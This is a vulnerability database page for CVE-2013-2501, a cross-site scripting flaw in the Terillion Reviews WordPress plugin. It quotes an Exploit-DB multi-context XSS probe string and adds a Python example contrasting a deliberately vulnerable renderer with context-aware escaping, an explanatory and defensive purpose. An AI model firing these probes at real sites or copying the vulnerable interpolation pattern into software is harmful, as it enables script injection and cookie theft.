CVE-2013-2501
Published: 2013-03-22
Priority: P4 (medium)
CVSS 2.0 base score: 4.3, vector AV:N/AC:M/Au:N/C:N/I:P/A:N (network-reachable, medium access complexity, no authentication; partial integrity impact only)
Exploit: public (see Exploit-DB below)
EPSS: 5.27% (91.5th percentile)
Cross-site scripting (XSS) vulnerability in the Terillion Reviews plugin before 1.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ProfileId field.
Affected
1 range

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| terillion | terillion_reviews_plugin | <= 1.1 | 1.2 |
No detection rules found.
Exploit-DB
(The index also attaches the entry "FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation" (exploitdb, 2013-06-21, CVE-2013-2171) to this page. That is a FreeBSD kernel local privilege escalation and has nothing to do with the Terillion Reviews plugin; the only occurrence of "2501" in it is the handle "_2501" in its greetings line. It is omitted here; see CVE-2013-2171 for that issue.)

WordPress Plugin Terillion Reviews - Profile Id HTML Injection (exploitdb, 2013-03-08, CVE-2013-2501)
---
source: https://www.securityfocus.com/bid/58415/info
The Terillion Reviews plugin for WordPress is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Test string from the entry (the classic multi-context XSS probe: it closes a single-quoted and a double-quoted JavaScript string, comments out the remainder, closes an open `<SCRIPT>` block, then breaks out of a double-quoted and a single-quoted attribute and opens a new script element):

```
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(8
```

The `</SCRIPT>` and `<SCRIPT>` tags were stripped when this entry was indexed and are restored above; the tail of the string is truncated in the indexed copy. `String.fromCharCode(88,83,83)` evaluates to "XSS".
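The bug class behind this CVE (a user-controlled profile identifier written into page output without escaping appropriate to the output context) and the reason a multi-context probe like the one above works are easier to see in code. The following is an added example written for this page; it is not code from the Terillion Reviews plugin or from the Exploit-DB entry, and the template markup, the `data-profile-id` attribute, the `profileId` JavaScript variable and the allow-list format for a profile id are all assumptions. It renders a constructed probe string through a direct-interpolation template and through a hardened one, and also shows why a JSON encoder alone is not enough for a value placed inside an inline `<script>` block.

```python
"""Context-aware escaping of a user-supplied profile id.

Illustrative example for CVE-2013-2501; the markup and id format are assumed,
not taken from the plugin.
"""
import html
import json
import re

# Constructed probe: breaks out of a single-quoted JS string, a double-quoted
# HTML attribute and an inline <script> block in one go, the same contexts
# the Exploit-DB test string for this CVE targets.
PROBE = "'\"></script><script>alert(1)</script>"

# Assumed shape of a legitimate profile id (allow-list; hypothetical format).
PROFILE_ID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def is_plausible_profile_id(value: str) -> bool:
    """First line of defence: reject anything that is not a plausible id."""
    return PROFILE_ID_RE.fullmatch(value) is not None


def render_widget_vulnerable(profile_id: str) -> str:
    """Interpolates the raw value into an attribute and an inline script,
    the pattern the advisory text describes (hypothetical markup)."""
    return (
        f'<div class="terillion-reviews" data-profile-id="{profile_id}"></div>\n'
        f"<script>var profileId = '{profile_id}';</script>"
    )


def naive_js_literal(value: str) -> str:
    """A valid JS string literal, but NOT safe inside a <script> block:
    json.dumps leaves '<', '>' and '&' untouched, so a value containing
    '</script>' still terminates the enclosing element."""
    return json.dumps(value)


def js_string_literal(value: str) -> str:
    """JS string literal that is also safe for the HTML parser: the three
    characters json.dumps leaves alone are written as \\uXXXX escapes, which
    JavaScript decodes but the HTML tokenizer never sees as markup."""
    return (
        json.dumps(value)
        .replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )


def render_widget_hardened(profile_id: str) -> str:
    """Same markup, with an encoder chosen per output context."""
    attr_value = html.escape(profile_id, quote=True)  # & < > " ' -> entities
    return (
        f'<div class="terillion-reviews" data-profile-id="{attr_value}"></div>\n'
        f"<script>var profileId = {js_string_literal(profile_id)};</script>"
    )


def script_tag_count(markup: str) -> int:
    """Number of '<script' openings the HTML tokenizer would see
    (case-insensitive, as the browser is)."""
    return markup.lower().count("<script")


if __name__ == "__main__":
    print("plausible id?", is_plausible_profile_id(PROBE))
    print("--- vulnerable ---")
    print(render_widget_vulnerable(PROBE))
    print("script openings:", script_tag_count(render_widget_vulnerable(PROBE)))
    print("--- hardened ---")
    print(render_widget_hardened(PROBE))
    print("script openings:", script_tag_count(render_widget_hardened(PROBE)))
```

The two renderers use the same template; only the encoding step differs. Validating the id against an allow-list first is the cheaper fix and what a reviewer would expect for an identifier, but it is not a substitute for escaping at the point of output, since the next field added to the template may not be an identifier.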
No writeups or analysis indexed.
References
http://archives.neohapsis.com/archives/bugtraq/2013-03/0055.html
http://osvdb.org/91123
http://packetstormsecurity.com/files/120730/WordPress-Terillion-Reviews-Cross-Site-Scripting.html
http://plugins.trac.wordpress.org/changeset/683838/terillion-reviews
http://wordpress.org/extend/plugins/terillion-reviews/changelog/
http://www.securityfocus.com/bid/58415
https://exchange.xforce.ibmcloud.com/vulnerabilities/82727